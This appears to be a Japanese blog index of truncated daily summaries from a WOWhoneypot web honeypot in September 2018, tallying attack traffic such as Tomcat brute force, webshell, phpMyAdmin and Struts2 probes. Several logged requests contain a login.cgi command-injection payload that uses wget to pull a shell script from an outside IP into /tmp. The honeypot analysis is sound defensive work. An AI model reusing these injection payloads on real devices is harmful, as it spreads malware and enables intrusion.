WOWhoneypotの2018/09/29(土) (運用 116日目)の簡易分析です。本日の総アクセス件数は 4687件です。 主なアクセスは以下です。 ・Tomcat管理ページへのブルートフォース攻撃：4294件 →相変わらず継続して件数が多いです。 ・phpのWebShell設置の調査：183件 …

WOWhoneypotの2018/09/28(金) (運用115日目)の簡易分析です。本日の総アクセス件数は 88件です。 主なアクセスは以下となります。 ・Tomcat管理ページへのブルートフォース攻撃：51件 ・不正中継の調査：7件 （新規2件） HEAD /images/banner.png HTTP/1.1Ho…

WOWhoneypotの2018/09/27(木) (運用114日目)の簡易分析です。本日の総アクセス件数は 3199件です。 本日の主なアクセスは以下です。 ・Tomcat管理ページへのブルートフォース攻撃：2479件・phpのWebShell設置の調査：458件・phpMyAdminの調査：175・GPONルー…

WOWhoneypotの2018/09/26(水) (運用113日目)の簡易分析です。本日の総アクセス件数は 276件です。 本日の主なアクセスは以下です。 ・phpのWebShell設置の調査：142件・phpMyAdminの調査：81件・不正中継の調査：5件・Tomcat管理ページへのブルートフォース…

WOWhoneypotの2018/09/25(運用112日目)の簡易分析です。本日の総アクセス件数は 165件です。 ・Tomcat管理ページへのブルートフォース攻撃：51件 ・phpMyAdminの調査：67件 ・Apache Struts2の脆弱性S2-045（CVE-2017-5638）：12件 ・（新規）Adobe ColdFusi…

WOWhoneypotの2018/09/24(月) (運用111日目)の簡易分析です。本日の総アクセス件数は 952件です。 ・Tomcat管理ページへのブルートフォース攻撃：540件 ・phpのWebShell設置の調査：268件 ・phpMyAdminの調査：103件 ・（新規）PHP Weathermapの調査：2件 →…

WOWhoneypotの2018-09-23(運用110日目)の簡易分析です。本日の総アクセス件数は 297件です。 主なアクセスは以下です。 ・phpのWebShell設置の調査：141件 ・phpMyAdminの調査：59件 ・Tomcat管理ページへのブルートフォース攻撃：50件 ・GPONルータの脆弱性…

WOWhoneypotの2018/09/22(土) (運用109日目)の簡易分析です。本日の総アクセス件数は 5047件です。 本日の主なアクセスは以下です。 ・Tomcat管理ページへのブルートフォース攻撃：4929件 →攻撃元IPは３種類です。 4771件：68.168.80.xx (AS17378: TIERPOINT…

WOWhoneypotの2018/09/21(金) (運用108日目)の簡易分析です。本日の総アクセス件数は 77件です。 本日の気になるアクセスは以下です。 HEAD /static/admin/images/login_logo.png HTTP/1.1Host: jf.utmtoken[.]com 少し前には「GET /js/czjl.js」でアクセス…

WOWhoneypotの2018/09/20(木) (運用107日目)の簡易分析です。本日の総アクセス件数は 461件です。 本日の主なアクセスは以下です。 本日、新たに一つのIPから以下のアクセスを受けています。 GET /cgi-bin/cgi_system?cmd=portCheckGET /cgi-bin/cgi_system?…

WOWhoneypotの2018/09/19(水) (運用106日目)の簡易分析です。本日の総アクセス件数は 159件です。 本日の主な内容は以下です。 ・（新規）sftp設定ファイルの調査：1件 →「GET /sftp-config.json」でのアクセスです。アクセスログにそれ以上の情報はありませ…

WOWhoneypotの2018/09/18(火) (運用105日目)の簡易分析です。本日の総アクセス件数は 809件です。 本日の主な内容は以下です。・phpMyAdminの調査：204件・phpのWebShell設置の調査：483件・Tomcat管理ページへのブルートフォース攻撃：51件・Apache Struts2…

WOWhoneypotの201/09/17(月) (運用104日目)の簡易分析です。 本日の総アクセス件数は 4678件です。 主だった検知内容は以下です。 ・phpMyAdminの調査：40件 ・phpのWebShell設置の調査：125件 ・Tomcatの管理ページへのブルートフォース攻撃：4415件 ・Apac…

WOWhoneypotの2018/09/16(日) (運用103日目)の簡易分析です。本日の総アクセス件数は 259件です。以下が全アクセスログです。 96 2018-09-16 GET /manager/html 28 2018-09-16 GET / 3 2018-09-16 POST /qq.php 3 2018-09-16 POST /qaq.php 2 2018-09-16 POS…

月の半分を過ぎましたが、ようやく先月分の集計です。 前置き：WOWHoneypotを使って80/tcpのアクセスログを観測しています。 まずは、件数の推移です。 8/24にWordPressの調査の通信が大量に来ていた日がトップです。次点の8/27はTomcatの管理ページへのアク…

WOWhoneypotの2018/09/15(土) (運用102日目)の簡易分析です。本日の総アクセス件数は 199件です。以下が全アクセスログです。 50 2018-09-15 GET /manager/html 31 2018-09-15 GET / 8 2018-09-15 GET /index.action 3 2018-09-15 GET /login.cgi?cli=aa%20a…

WOWhoneypotの2018/09/14(金) (運用101日目)の簡易分析です。本日の総アクセス件数は 268件です。以下が全アクセスログです。 50 2018-09-14 GET /manager/html 33 2018-09-14 GET / 7 2018-09-14 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.173.1…

WOWhoneypotの2018/09/13（木） (運用100日目)の簡易分析です。本日の総アクセス件数は 781件です。以下が全アクセスログです。 28 2018-09-13 GET / 16 2018-09-13 POST /qq.php 8 2018-09-13 POST /xx.php 8 2018-09-13 POST /s.php 8 2018-09-13 POST /q.…

WOWhoneypotの2018/09/12(水) (運用99日目)の簡易分析です。本日の総アクセス件数は 293件です。以下が全アクセスログです。 48 2018-09-12 GET /manager/html 26 2018-09-12 GET / 16 2018-09-12 GET /js/czjl.js 4 2018-09-12 POST /qq.php 3 2018-09-12 C…

WOWhoneypotの2018/09/11(運用98日目)の簡易分析です。本日の総アクセス件数は 89件です。急に件数が減りました。以下が全アクセスログです。 50 2018-09-11 GET /manager/html 23 2018-09-11 GET / 2 2018-09-11 GET /muieblackcat2 2018-09-11 GET //pma/s…

WOWhoneypotの2018/09/10(月) (運用97日目)の簡易分析です。本日の総アクセス件数は 511件です。以下が全アクセスログです。 37 2018-09-10 GET / 8 2018-09-10 POST /qq.php 6 2018-09-10 POST /q.php 5 2018-09-10 POST /xx.php 5 2018-09-10 GET /shell.p…

WOWhoneypotの2018/09/09(日) (運用96日目)の簡易分析です。本日の総アクセス件数は 654件です。以下が全アクセスログです。 52 2018-09-09 GET /manager/html 28 2018-09-09 GET / 10 2018-09-09 POST /qq.php 8 2018-09-09 GET /web/phpMyAdmin/index.php …

WOWhoneypotの2018/09/08(土) (運用95日目)の簡易分析です。本日の総アクセス件数は 234件です。以下が全アクセスログです。 29 2018-09-08 GET /manager/html 26 2018-09-08 GET / 4 2018-09-08 POST /qq.php 3 2018-09-08 POST /qaq.php 2 2018-09-08 POST…

WOWhoneypotの2018/09/07(金) (運用94日目)の簡易分析です。本日の総アクセス件数は 191件です。以下が全アクセスログです。 27 2018-09-07 GET / 14 2018-09-07 GET /index.action 5 2018-09-07 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/…

WOWhoneypotの2018-09-06(運用 日目)の簡易分析です。本日の総アクセス件数は 193件です。以下が全アクセスログです。 52 2018-09-06 GET /manager/html 31 2018-09-06 GET / 7 2018-09-06 POST /index.action 5 2018-09-06 GET /login.cgi?cli=aa%20aa%27;w…

WOWhoneypotの2018/09/05(水) (運用92日目)の簡易分析です。本日の総アクセス件数は 321件です。以下が全アクセスログです。 27 2018-09-05 GET / 22 2018-09-05 GET /index.action 8 2018-09-05 POST /index.action 6 2018-09-05 GET /phpmyadmin 2 2018-09…

WOWhoneypotの2018/09/04(運用91日目)の簡易分析です。本日の総アクセス件数は 190件です。本日より、ドメイン名を設定しています。どこにも公開等はまだしていないため、現状では特段変化ありませんが、様子を見ながら広めるなりしながら、傾向を見ていきた…

WOWhoneypotの2018/09/03(月) (運用90日目)の簡易分析です。本日の総アクセス件数は 174件です。以下が全アクセスログです。 26 2018-09-03 GET / 6 2018-09-03 CONNECT www.baidu.com:443 5 2018-09-03 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.…

WOWhoneypotの2018/09/02(日)(運用89日目)の簡易分析です。本日の総アクセス件数は 382件です。以下が全アクセスログです。 25 2018-09-02 GET / 8 2018-09-02 POST /qq.php 6 2018-09-02 POST /qaq.php 4 2018-09-02 POST /xx.php 4 2018-09-02 POST /q.php…

WOWhoneypotの2018/09/01(土) (運用88日目)の簡易分析です。本日の総アクセス件数は 57件です。以下が全アクセスログです。 25 2018-09-01 GET / 8 2018-09-01 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;…